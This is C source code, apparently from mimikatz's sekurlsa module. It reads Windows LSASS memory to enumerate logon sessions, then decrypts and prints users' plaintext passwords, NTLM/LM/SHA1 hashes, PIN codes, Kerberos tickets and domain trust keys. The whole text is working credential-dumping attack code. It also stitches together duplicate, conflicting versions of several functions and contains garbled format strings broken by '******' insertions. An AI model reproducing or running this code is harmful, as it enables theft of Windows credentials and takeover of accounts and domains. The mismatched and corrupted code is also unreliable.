VOID kuhl_m_sekurlsa_msv_enum_cred(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PVOID pCredentials, IN PKUHL_M_SEKURLSA_MSV_CRED_CALLBACK credCallback, IN PVOID optionalData)
{
KIWI_MSV1_0_CREDENTIALS credentials;
KIWI_MSV1_0_PRIMARY_CREDENTIALS primaryCredentials;
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &hLocalMemory}, aLsassMemory = {pCredentials, cLsass->hLsassMem};
while(aLsassMemory.address)
{
aLocalMemory.address = &credentials;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_MSV1_0_CREDENTIALS)))
{
aLsassMemory.address = credentials.PrimaryCredentials;
while(aLsassMemory.address)
{
aLocalMemory.address = &primaryCredentials;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_MSV1_0_PRIMARY_CREDENTIALS)))
{
aLsassMemory.address = primaryCredentials.Credentials.Buffer;
if(kull_m_string_getUnicodeString(&primaryCredentials.Credentials, cLsass->hLsassMem))
{
if(kull_m_string_getUnicodeString((PUNICODE_STRING) &primaryCredentials.Primary, cLsass->hLsassMem))
{
credCallback(&primaryCredentials, credentials.AuthenticationPackageId, &aLsassMemory, optionalData);
LocalFree(primaryCredentials.Primary.Buffer);
}
LocalFree(primaryCredentials.Credentials.Buffer);
}
} else kprintf(L"n.e. (KIWI_MSV1_0_PRIMARY_CREDENTIALS KO)");
aLsassMemory.address = primaryCredentials.next;
}
aLsassMemory.address = credentials.next;
} else kprintf(L"n.e. (KIWI_MSV1_0_CREDENTIALS KO)");
}
}
void kuhl_m_sekurlsa_kerberos_createExternalName(PKERB_EXTERNAL_NAME *pExternalName, PKULL_M_MEMORY_HANDLE hLSASS)
{
BOOL status = FALSE;
KERB_EXTERNAL_NAME extName;
PKERB_EXTERNAL_NAME pTempName;
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aName = {*pExternalName, hLSASS}, aLocalBuffer = {&extName, &hBuffer};//, aLocalStrings = {NULL, &hBuffer};
DWORD i;
if(aName.address)
{
*pExternalName = NULL;
if(kull_m_memory_copy(&aLocalBuffer, &aName, sizeof(KERB_EXTERNAL_NAME) - sizeof(UNICODE_STRING)))
{
i = sizeof(KERB_EXTERNAL_NAME) + (sizeof(UNICODE_STRING) * (extName.NameCount - 1));
if(pTempName = (PKERB_EXTERNAL_NAME) LocalAlloc(LPTR, i))
{
*pExternalName = pTempName;
aLocalBuffer.address = pTempName;
if(status = kull_m_memory_copy(&aLocalBuffer, &aName, i))
for(i = 0; status && (i < pTempName->NameCount); i++)
status = kull_m_string_getUnicodeString(&pTempName->Names[i], hLSASS);
}
}
}
}
PKIWI_KERBEROS_TICKET kuhl_m_sekurlsa_kerberos_createTicket(PBYTE pTicket, PKULL_M_MEMORY_HANDLE hLSASS)
{
BOOL status = FALSE;
PKIWI_KERBEROS_TICKET ticket;
if(ticket = (PKIWI_KERBEROS_TICKET) LocalAlloc(LPTR, sizeof(KIWI_KERBEROS_TICKET)))
{
ticket->StartTime = *(PFILETIME) (pTicket + kerbHelper[KerbOffsetIndex].offsetStartTime);
ticket->EndTime = *(PFILETIME) (pTicket + kerbHelper[KerbOffsetIndex].offsetEndTime);
ticket->RenewUntil = *(PFILETIME) (pTicket + kerbHelper[KerbOffsetIndex].offsetRenewUntil);
ticket->ServiceName = *(PKERB_EXTERNAL_NAME *) (pTicket + kerbHelper[KerbOffsetIndex].offsetServiceName);
kuhl_m_sekurlsa_kerberos_createExternalName(&ticket->ServiceName, hLSASS);
ticket->DomainName = *(PUNICODE_STRING) (pTicket + kerbHelper[KerbOffsetIndex].offsetDomainName);
kull_m_string_getUnicodeString(&ticket->DomainName, hLSASS);
ticket->TargetName = *(PKERB_EXTERNAL_NAME *) (pTicket + kerbHelper[KerbOffsetIndex].offsetTargetName);
kuhl_m_sekurlsa_kerberos_createExternalName(&ticket->TargetName, hLSASS);
ticket->TargetDomainName = *(PUNICODE_STRING) (pTicket + kerbHelper[KerbOffsetIndex].offsetTargetDomainName);
kull_m_string_getUnicodeString(&ticket->TargetDomainName, hLSASS);
ticket->ClientName = *(PKERB_EXTERNAL_NAME *) (pTicket + kerbHelper[KerbOffsetIndex].offsetClientName);
kuhl_m_sekurlsa_kerberos_createExternalName(&ticket->ClientName, hLSASS);
ticket->AltTargetDomainName = *(PUNICODE_STRING) (pTicket + kerbHelper[KerbOffsetIndex].offsetAltTargetDomainName);
kull_m_string_getUnicodeString(&ticket->AltTargetDomainName, hLSASS);
ticket->Description = *(PUNICODE_STRING) (pTicket + kerbHelper[KerbOffsetIndex].offsetDescription);
kull_m_string_getUnicodeString(&ticket->Description, hLSASS);
ticket->KeyType = *(PULONG) ((pTicket + kerbHelper[KerbOffsetIndex].offsetKeyType));
ticket->Key = *(PKIWI_KERBEROS_BUFFER) ((pTicket + kerbHelper[KerbOffsetIndex].offsetKey));;
kuhl_m_sekurlsa_kerberos_createKiwiKerberosBuffer(&ticket->Key, hLSASS);
ticket->TicketFlags = *(PULONG) ((pTicket + kerbHelper[KerbOffsetIndex].offsetTicketFlags));
ticket->TicketEncType = *(PULONG) ((pTicket + kerbHelper[KerbOffsetIndex].offsetTicketEncType));
ticket->TicketKvno = *(PULONG) ((pTicket + kerbHelper[KerbOffsetIndex].offsetTicketKvno));
ticket->Ticket = *(PKIWI_KERBEROS_BUFFER) ((pTicket + kerbHelper[KerbOffsetIndex].offsetTicket));;
kuhl_m_sekurlsa_kerberos_createKiwiKerberosBuffer(&ticket->Ticket, hLSASS);
}
return ticket;
}
void kuhl_m_sekurlsa_trust_domaininfo(struct _KDC_DOMAIN_INFO * info)
{
if(kull_m_string_getUnicodeString(&info->FullDomainName, cLsass.hLsassMem))
{
if(kull_m_string_getUnicodeString(&info->NetBiosName, cLsass.hLsassMem))
{
kprintf(L"\nDomain: %wZ (%wZ", &info->FullDomainName, &info->NetBiosName);
if(kull_m_string_getSid(&info->DomainSid, cLsass.hLsassMem))
{
kprintf(L" / "); kull_m_string_displaySID(info->DomainSid);
LocalFree(info->DomainSid);
}
kprintf(L")\n");
kuhl_m_sekurlsa_trust_domainkeys(&info->IncomingAuthenticationKeys, L" Out ", FALSE, &info->FullDomainName); // Input keys are for Out relation ship...
kuhl_m_sekurlsa_trust_domainkeys(&info->OutgoingAuthenticationKeys, L" In ", TRUE, &info->FullDomainName);
kuhl_m_sekurlsa_trust_domainkeys(&info->IncomingPreviousAuthenticationKeys, L"Out-1", FALSE, &info->FullDomainName);
kuhl_m_sekurlsa_trust_domainkeys(&info->OutgoingPreviousAuthenticationKeys, L" In-1", TRUE, &info->FullDomainName);
LocalFree(info->NetBiosName.Buffer);
}
LocalFree(info->FullDomainName.Buffer);
}
}
void kuhl_m_sekurlsa_trust_domainkeys(struct _KDC_DOMAIN_KEYS_INFO * keysInfo, PCWSTR prefix, BOOL incoming, PCUNICODE_STRING domain)
{
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aLsass = {keysInfo->keys, cLsass.hLsassMem}, aData = {NULL, &hBuffer};
DWORD i;
PKDC_DOMAIN_KEYS domainKeys;
if((keysInfo->keysSize && keysInfo->keys) || (keysInfo->password.Length && keysInfo->password.Buffer))
{
kprintf(L"\n [%s] ", prefix);
kprintf(incoming ? L"-> %wZ\n" : L"%wZ ->\n", domain);
if(kull_m_string_getUnicodeString(&keysInfo->password, cLsass.hLsassMem))
{
kprintf(L"\tfrom: ");
if(kull_m_string_suspectUnicodeString(&keysInfo->password))
kprintf(L"%wZ", &keysInfo->password);
else kull_m_string_wprintf_hex(keysInfo->password.Buffer, keysInfo->password.Length, 1);
LocalFree(keysInfo->password.Buffer);
}
kprintf(L"\n");
if(keysInfo->keysSize && keysInfo->keys)
{
if(domainKeys = (PKDC_DOMAIN_KEYS) LocalAlloc(LPTR, keysInfo->keysSize))
{
aData.address = domainKeys;
if(kull_m_memory_copy(&aData, &aLsass, keysInfo->keysSize))
{
for(i = 0; i < domainKeys->nbKeys; i++)
{
kprintf(L"\t* %s : ", kuhl_m_kerberos_ticket_etype(domainKeys->keys[i].type));
kull_m_string_wprintf_hex((PBYTE) domainKeys + domainKeys->keys[i].offset, domainKeys->keys[i].size, 0);
kprintf(L"\n");
}
}
LocalFree(domainKeys);
}
}
}
}
NTSTATUS kuhl_m_sekurlsa_enum(PKUHL_M_SEKURLSA_ENUM callback, LPVOID pOptionalData)
{
KIWI_BASIC_SECURITY_LOGON_SESSION_DATA sessionData;
ULONG nbListes = 1, i;
PVOID pStruct;
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS securityStruct, data = {&nbListes, &hLocalMemory}, aBuffer = {NULL, &hLocalMemory};
BOOL retCallback = TRUE;
const KUHL_M_SEKURLSA_ENUM_HELPER * helper;
NTSTATUS status = kuhl_m_sekurlsa_acquireLSA();
if(NT_SUCCESS(status))
{
sessionData.cLsass = &cLsass;
sessionData.lsassLocalHelper = lsassLocalHelper;
if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_2K3)
helper = &lsassEnumHelpers[0];
else if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_VISTA)
helper = &lsassEnumHelpers[1];
else if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_7)
helper = &lsassEnumHelpers[2];
else if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_8)
helper = &lsassEnumHelpers[3];
else if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_BLUE)
helper = &lsassEnumHelpers[5];
else
helper = &lsassEnumHelpers[6];
if((cLsass.osContext.BuildNumber >= KULL_M_WIN_MIN_BUILD_7) && (cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_BLUE) && (kuhl_m_sekurlsa_msv_package.Module.Informations.TimeDateStamp > 0x53480000))
helper++; // yeah, really, I do that =)
securityStruct.hMemory = cLsass.hLsassMem;
if(securityStruct.address = LogonSessionListCount)
kull_m_memory_copy(&data, &securityStruct, sizeof(ULONG));
for(i = 0; i < nbListes; i++)
{
securityStruct.address = &LogonSessionList[i];
data.address = &pStruct;
data.hMemory = &hLocalMemory;
if(aBuffer.address = LocalAlloc(LPTR, helper->tailleStruct))
{
if(kull_m_memory_copy(&data, &securityStruct, sizeof(PVOID)))
{
data.address = pStruct;
data.hMemory = securityStruct.hMemory;
while((data.address != securityStruct.address) && retCallback)
{
if(kull_m_memory_copy(&aBuffer, &data, helper->tailleStruct))
{
sessionData.LogonId = (PLUID) ((PBYTE) aBuffer.address + helper->offsetToLuid);
sessionData.LogonType = *((PULONG) ((PBYTE) aBuffer.address + helper->offsetToLogonType));
sessionData.Session = *((PULONG) ((PBYTE) aBuffer.address + helper->offsetToSession));
sessionData.UserName = (PUNICODE_STRING) ((PBYTE) aBuffer.address + helper->offsetToUsername);
sessionData.LogonDomain = (PUNICODE_STRING) ((PBYTE) aBuffer.address + helper->offsetToDomain);
sessionData.pCredentials= *(PVOID *) ((PBYTE) aBuffer.address + helper->offsetToCredentials);
sessionData.pSid = *(PSID *) ((PBYTE) aBuffer.address + helper->offsetToPSid);
sessionData.pCredentialManager = *(PVOID *) ((PBYTE) aBuffer.address + helper->offsetToCredentialManager);
sessionData.LogonTime = *((PFILETIME) ((PBYTE) aBuffer.address + helper->offsetToLogonTime));
sessionData.LogonServer = (PUNICODE_STRING) ((PBYTE) aBuffer.address + helper->offsetToLogonServer);
kull_m_string_getUnicodeString(sessionData.UserName, cLsass.hLsassMem);
kull_m_string_getUnicodeString(sessionData.LogonDomain, cLsass.hLsassMem);
kull_m_string_getUnicodeString(sessionData.LogonServer, cLsass.hLsassMem);
kull_m_string_getSid(&sessionData.pSid, cLsass.hLsassMem);
retCallback = callback(&sessionData, pOptionalData);
if(sessionData.UserName->Buffer)
LocalFree(sessionData.UserName->Buffer);
if(sessionData.LogonDomain->Buffer)
LocalFree(sessionData.LogonDomain->Buffer);
if(sessionData.LogonServer->Buffer)
LocalFree(sessionData.LogonServer->Buffer);
if(sessionData.pSid)
LocalFree(sessionData.pSid);
data.address = ((PLIST_ENTRY) (aBuffer.address))->Flink;
}
else break;
}
}
LocalFree(aBuffer.address);
}
}
}
return status;
}
VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds, PLUID luid, ULONG flags)
{
PUNICODE_STRING credentials, username = NULL, domain = NULL, password = NULL;
PMSV1_0_PRIMARY_CREDENTIAL pPrimaryCreds;
PMSV1_0_PRIMARY_CREDENTIAL_10 pPrimaryCreds10;
PRPCE_CREDENTIAL_KEYCREDENTIAL pRpceCredentialKeyCreds;
PKERB_HASHPASSWORD_GENERIC pHashPassword;
UNICODE_STRING buffer;
PVOID base;
DWORD type, i;
if(mesCreds)
{
if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL)
{
type = flags & KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL_MASK;
credentials = (PUNICODE_STRING) mesCreds;
if(credentials->Buffer)
{
if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/)
(*lsassLocalHelper->pLsaUnprotectMemory)(((PUNICODE_STRING) mesCreds)->Buffer, ((PUNICODE_STRING) mesCreds)->Length);
switch(type)
{
case KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY:
pPrimaryCreds = (PMSV1_0_PRIMARY_CREDENTIAL) credentials->Buffer;
kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds, &pPrimaryCreds->UserName, FALSE);
kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds, &pPrimaryCreds->LogonDomainName, FALSE);
kprintf(L"\n\t * Username : %wZ\n\t * Domain : %wZ", &pPrimaryCreds->UserName, &pPrimaryCreds->LogonDomainName);
if(pPrimaryCreds->isLmOwfPassword)
{
kprintf(L"\n\t * LM : ");
kull_m_string_wprintf_hex(pPrimaryCreds->LmOwfPassword, LM_NTLM_HASH_LENGTH, 0);
}
if(pPrimaryCreds->isNtOwfPassword)
{
kprintf(L"\n\t * NTLM : ");
kull_m_string_wprintf_hex(pPrimaryCreds->NtOwfPassword, LM_NTLM_HASH_LENGTH, 0);
}
if(pPrimaryCreds->isShaOwPassword)
{
kprintf(L"\n\t * SHA1 : ");
kull_m_string_wprintf_hex(pPrimaryCreds->ShaOwPassword, SHA_DIGEST_LENGTH, 0);
}
break;
case KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY_10:
pPrimaryCreds10 = (PMSV1_0_PRIMARY_CREDENTIAL_10) credentials->Buffer;
kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds10, &pPrimaryCreds10->UserName, FALSE);
kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds10, &pPrimaryCreds10->LogonDomainName, FALSE);
kprintf(L"\n\t * Username : %wZ\n\t * Domain : %wZ", &pPrimaryCreds10->UserName, &pPrimaryCreds10->LogonDomainName);
kprintf(L"\n\t * Flags : %02x/N%02x/L%02x/S%02x/%02x/%02x/%02x/%02x", pPrimaryCreds10->isUnk0, pPrimaryCreds10->isNtOwfPassword, pPrimaryCreds10->isLmOwfPassword, pPrimaryCreds10->isShaOwPassword, pPrimaryCreds10->isUnk1, pPrimaryCreds10->isUnk2, pPrimaryCreds10->isUnk3, pPrimaryCreds10->isUnk4);
if(pPrimaryCreds10->isLmOwfPassword)
{
kprintf(L"\n\t * LM : ");
kull_m_string_wprintf_hex(pPrimaryCreds10->LmOwfPassword, LM_NTLM_HASH_LENGTH, 0);
}
if(pPrimaryCreds10->isNtOwfPassword)
{
kprintf(L"\n\t * NTLM : ");
kull_m_string_wprintf_hex(pPrimaryCreds10->NtOwfPassword, LM_NTLM_HASH_LENGTH, 0);
}
if(pPrimaryCreds10->isShaOwPassword)
{
kprintf(L"\n\t * SHA1 : ");
kull_m_string_wprintf_hex(pPrimaryCreds10->ShaOwPassword, SHA_DIGEST_LENGTH, 0);
}
kprintf(L"\n\t * unknow : ");
kull_m_string_wprintf_hex(pPrimaryCreds10->UnkStruct, 128, 0);
break;
case KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY:
pRpceCredentialKeyCreds = (PRPCE_CREDENTIAL_KEYCREDENTIAL) credentials->Buffer;
base = (PBYTE) pRpceCredentialKeyCreds + sizeof(RPCE_CREDENTIAL_KEYCREDENTIAL) + (pRpceCredentialKeyCreds->unk0 - 1) * sizeof(MARSHALL_KEY);
for (i = 0; i < pRpceCredentialKeyCreds->unk0; i++)
kuhl_m_sekurlsa_genericKeyOutput(&pRpceCredentialKeyCreds->key[i], &base);
break;
default:
kprintf(L"\n\t * Raw data : ");
kull_m_string_wprintf_hex(credentials->Buffer, credentials->Length, 1);
}
}
}
else if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE)
{
if(mesCreds->UserName.Buffer)
{
if(kull_m_string_getUnicodeString(&mesCreds->UserName, cLsass.hLsassMem))
{
if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/)
(*lsassLocalHelper->pLsaUnprotectMemory)(mesCreds->UserName.Buffer, mesCreds->UserName.MaximumLength);
kprintf(L"\n\t * PIN code : %wZ", &mesCreds->UserName);
LocalFree(mesCreds->UserName.Buffer);
}
}
}
else if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST)
{
pHashPassword = (PKERB_HASHPASSWORD_GENERIC) mesCreds;
kprintf(L"\t %s ", kuhl_m_kerberos_ticket_etype(pHashPassword->Type));
if(buffer.Length = buffer.MaximumLength = (USHORT) pHashPassword->Size)
{
buffer.Buffer = (PWSTR) pHashPassword->Checksump;
if(kull_m_string_getUnicodeString(&buffer, cLsass.hLsassMem))
{
if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/)
(*lsassLocalHelper->pLsaUnprotectMemory)(buffer.Buffer, buffer.MaximumLength);
kull_m_string_wprintf_hex(buffer.Buffer, buffer.Length, 0);
LocalFree(buffer.Buffer);
}
}
else kprintf(L"<no size, buffer is incorrect>");
kprintf(L"\n");
}
else
{
if(mesCreds->UserName.Buffer || mesCreds->Domaine.Buffer || mesCreds->Password.Buffer)
{
if(kull_m_string_getUnicodeString(&mesCreds->UserName, cLsass.hLsassMem) && kull_m_string_suspectUnicodeString(&mesCreds->UserName))
{
if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN))
username = &mesCreds->UserName;
else
domain = &mesCreds->UserName;
}
if(kull_m_string_getUnicodeString(&mesCreds->Domaine, cLsass.hLsassMem) && kull_m_string_suspectUnicodeString(&mesCreds->Domaine))
{
if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN))
domain = &mesCreds->Domaine;
else
username = &mesCreds->Domaine;
}
if(kull_m_string_getUnicodeString(&mesCreds->Password, cLsass.hLsassMem) /*&& !kull_m_string_suspectUnicodeString(&mesCreds->Password)*/)
{
if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/)
(*lsassLocalHelper->pLsaUnprotectMemory)(mesCreds->Password.Buffer, mesCreds->Password.MaximumLength);
password = &mesCreds->Password;
}
if(password || !(flags & KUHL_SEKURLSA_CREDS_DISPLAY_WPASSONLY))
{
kprintf((flags & KUHL_SEKURLSA_CREDS_DISPLAY_LINE) ?
L"%wZ\t%wZ\t"
:
L"\n\t * Username : %wZ"
L"\n\t * Domain : %wZ"
L"\n\t * Password : "******"%.*s", password->Length / sizeof(wchar_t), password->Buffer);
else
kprintf(L"%wZ", password);
}
else kull_m_string_wprintf_hex(password->Buffer, password->Length, 1);
}
LocalFree(mesCreds->UserName.Buffer);
LocalFree(mesCreds->Domaine.Buffer);
LocalFree(mesCreds->Password.Buffer);
}
}
if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NEWLINE)
kprintf(L"\n");
}
else kprintf(L"LUID KO\n");
}
VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds, PLUID luid, ULONG flags, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData)
{
PUNICODE_STRING credentials, username = NULL, domain = NULL, password = NULL;
PMSV1_0_PRIMARY_CREDENTIAL pPrimaryCreds;
PRPCE_CREDENTIAL_KEYCREDENTIAL pRpceCredentialKeyCreds;
PVOID base;
DWORD type, i;
if(mesCreds)
{
if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL)
{
type = flags & KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL_MASK;
credentials = (PUNICODE_STRING) mesCreds;
if(credentials->Buffer)
{
if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/)
(*lsassLocalHelper->pLsaUnprotectMemory)(((PUNICODE_STRING) mesCreds)->Buffer, ((PUNICODE_STRING) mesCreds)->Length);
switch(type)
{
case KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY:
pPrimaryCreds = (PMSV1_0_PRIMARY_CREDENTIAL) credentials->Buffer;
kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds, &pPrimaryCreds->UserName, FALSE);
kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds, &pPrimaryCreds->LogonDomainName, FALSE);
if(externalCallback)
externalCallback(luid, &pPrimaryCreds->UserName, &pPrimaryCreds->LogonDomainName, NULL, pPrimaryCreds->LmOwfPassword, pPrimaryCreds->NtOwfPassword, externalCallbackData);
kprintf(L"\n\t * Username : %wZ"
L"\n\t * Domain : %wZ"
, &pPrimaryCreds->UserName, &pPrimaryCreds->LogonDomainName);
kprintf(L"\n\t * LM : "); kull_m_string_wprintf_hex(pPrimaryCreds->LmOwfPassword, LM_NTLM_HASH_LENGTH, 0);
kprintf(L"\n\t * NTLM : "); kull_m_string_wprintf_hex(pPrimaryCreds->NtOwfPassword, LM_NTLM_HASH_LENGTH, 0);
kprintf(L"\n\t * SHA1 : "); kull_m_string_wprintf_hex(pPrimaryCreds->ShaOwPassword, SHA_DIGEST_LENGTH, 0);
break;
case KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY:
pRpceCredentialKeyCreds = (PRPCE_CREDENTIAL_KEYCREDENTIAL) credentials->Buffer;
base = (PBYTE) pRpceCredentialKeyCreds + sizeof(RPCE_CREDENTIAL_KEYCREDENTIAL) + (pRpceCredentialKeyCreds->unk0 - 1) * sizeof(MARSHALL_KEY);
for (i = 0; i < pRpceCredentialKeyCreds->unk0; i++)
kuhl_m_sekurlsa_genericKeyOutput(&pRpceCredentialKeyCreds->key[i], &base);
break;
default:
kprintf(L"\n\t * Raw data : ");
kull_m_string_wprintf_hex(credentials->Buffer, credentials->Length, 1);
}
}
}
else if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE)
{
if(mesCreds->UserName.Buffer)
{
if(kull_m_string_getUnicodeString(&mesCreds->UserName, cLsass.hLsassMem))
{
if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/)
(*lsassLocalHelper->pLsaUnprotectMemory)(mesCreds->UserName.Buffer, mesCreds->UserName.MaximumLength);
kprintf(L"\n\t * PIN code : %wZ", &mesCreds->UserName);
LocalFree(mesCreds->UserName.Buffer);
}
}
}
else
{
if(mesCreds->UserName.Buffer || mesCreds->Domaine.Buffer || mesCreds->Password.Buffer)
{
if(kull_m_string_getUnicodeString(&mesCreds->UserName, cLsass.hLsassMem) && kull_m_string_suspectUnicodeString(&mesCreds->UserName))
{
if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN))
username = &mesCreds->UserName;
else
domain = &mesCreds->UserName;
}
if(kull_m_string_getUnicodeString(&mesCreds->Domaine, cLsass.hLsassMem) && kull_m_string_suspectUnicodeString(&mesCreds->Domaine))
{
if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN))
domain = &mesCreds->Domaine;
else
username = &mesCreds->Domaine;
}
if(kull_m_string_getUnicodeString(&mesCreds->Password, cLsass.hLsassMem) /*&& !kull_m_string_suspectUnicodeString(&mesCreds->Password)*/)
{
if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/)
(*lsassLocalHelper->pLsaUnprotectMemory)(mesCreds->Password.Buffer, mesCreds->Password.MaximumLength);
password = &mesCreds->Password;
}
if(externalCallback)
externalCallback(luid, username, domain, password, NULL, NULL, externalCallbackData);
if(password || !(flags & KUHL_SEKURLSA_CREDS_DISPLAY_WPASSONLY))
{
kprintf((flags & KUHL_SEKURLSA_CREDS_DISPLAY_LINE) ?
L"%wZ\t%wZ\t"
:
L"\n\t * Username : %wZ"
L"\n\t * Domain : %wZ"
L"\n\t * Password : "******"%wZ", password);
else
kull_m_string_wprintf_hex(password->Buffer, password->Length, 1);
}
LocalFree(mesCreds->UserName.Buffer);
LocalFree(mesCreds->Domaine.Buffer);
LocalFree(mesCreds->Password.Buffer);
}
}
if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NEWLINE)
kprintf(L"\n");
}
else kprintf(L"LUID KO\n");
}
NTSTATUS kuhl_m_sekurlsa_enum(PKUHL_M_SEKURLSA_ENUM callback, LPVOID pOptionalData)
{
KIWI_BASIC_SECURITY_LOGON_SESSION_DATA sessionData;
ULONG nbListes = 0, i;
PVOID pStruct;
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS securityStruct, data = {&nbListes, &hLocalMemory}, aBuffer = {NULL, &hLocalMemory};
BOOL retCallback = TRUE;
const KUHL_M_SEKURLSA_ENUM_HELPER * helper;
NTSTATUS status = kuhl_m_sekurlsa_acquireLSA();
if(NT_SUCCESS(status))
{
sessionData.cLsass = &cLsass;
sessionData.lsassLocalHelper = lsassLocalHelper;
if(cLsass.osContext.MajorVersion < 6)
helper = &lsassEnumHelpers[0];
else if(cLsass.osContext.MinorVersion < 2)
helper = &lsassEnumHelpers[1];
else if(cLsass.osContext.MinorVersion < 3)
helper = &lsassEnumHelpers[2];
else
helper = &lsassEnumHelpers[3];
securityStruct.hMemory = cLsass.hLsassMem;
securityStruct.address = LogonSessionListCount;
if(securityStruct.address)
kull_m_memory_copy(&data, &securityStruct, sizeof(ULONG));
else *(PULONG) data.address = 1;
for(i = 0; i < nbListes; i++)
{
securityStruct.address = &LogonSessionList[i];
data.address = &pStruct;
data.hMemory = &hLocalMemory;
if(aBuffer.address = LocalAlloc(LPTR, helper->tailleStruct))
{
if(kull_m_memory_copy(&data, &securityStruct, sizeof(PVOID)))
{
data.address = pStruct;
data.hMemory = securityStruct.hMemory;
while((data.address != securityStruct.address) && retCallback)
{
if(kull_m_memory_copy(&aBuffer, &data, helper->tailleStruct))
{
sessionData.LogonId = (PLUID) ((PBYTE) aBuffer.address + helper->offsetToLuid);
sessionData.LogonType = *((PULONG) ((PBYTE) aBuffer.address + helper->offsetToLogonType));
sessionData.Session = *((PULONG) ((PBYTE) aBuffer.address + helper->offsetToSession));
sessionData.UserName = (PUNICODE_STRING) ((PBYTE) aBuffer.address + helper->offsetToUsername);
sessionData.LogonDomain = (PUNICODE_STRING) ((PBYTE) aBuffer.address + helper->offsetToDomain);
sessionData.pCredentials= *(PVOID *) ((PBYTE) aBuffer.address + helper->offsetToCredentials);
sessionData.pSid = *(PSID *) ((PBYTE) aBuffer.address + helper->offsetToPSid);
kull_m_string_getUnicodeString(sessionData.UserName, cLsass.hLsassMem);
kull_m_string_getUnicodeString(sessionData.LogonDomain, cLsass.hLsassMem);
kuhl_m_sekurlsa_utils_getSid(&sessionData.pSid, cLsass.hLsassMem);
retCallback = callback(&sessionData, pOptionalData);
LocalFree(sessionData.UserName->Buffer);
LocalFree(sessionData.LogonDomain->Buffer);
LocalFree(sessionData.pSid);
data.address = ((PLIST_ENTRY) (aBuffer.address))->Flink;
}
else break;
}
}
LocalFree(aBuffer.address);
}
}
}
return status;
}
